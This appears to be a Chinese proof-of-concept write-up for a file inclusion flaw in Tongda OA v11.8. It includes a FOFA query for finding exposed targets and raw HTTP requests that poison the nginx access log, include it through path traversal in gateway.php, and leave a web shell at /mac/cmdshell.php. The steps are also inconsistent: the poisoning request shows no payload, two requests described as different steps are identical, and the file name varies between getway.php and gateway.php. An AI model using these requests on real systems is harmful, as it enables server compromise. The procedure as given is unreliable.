# 通达OA v11.8 getway.php 远程文件包含漏洞 ## 漏洞描述 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞 ## 漏洞影响 ``` 通达OA v11.8 ``` ## FOFA ``` app="TDXK-通达OA" ``` ## 漏洞复现 登陆页面 ![image-20220520154525896](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201545994.png) 发送恶意请求让日志被记录 ``` GET /d1a4278d?json={}&aa= HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Accept-Encoding: gzip ``` ![image-20220520154539264](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201545324.png) 在通过漏洞包含日志文件 ``` POST /ispirit/interface/gateway.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 54 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip json={"url":"/general/../../nginx/logs/oa.access.log"} ``` ![image-20220520154553517](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201545558.png) 再次发送恶意请求写入文件 ``` POST /mac/gateway.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 54 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip json={"url":"/general/../../nginx/logs/oa.access.log"} ``` ![image-20220520154607791](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201546852.png) 访问写入的文件 `/mac/cmdshell.php` ![image-20220520154623095](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205201546179.png)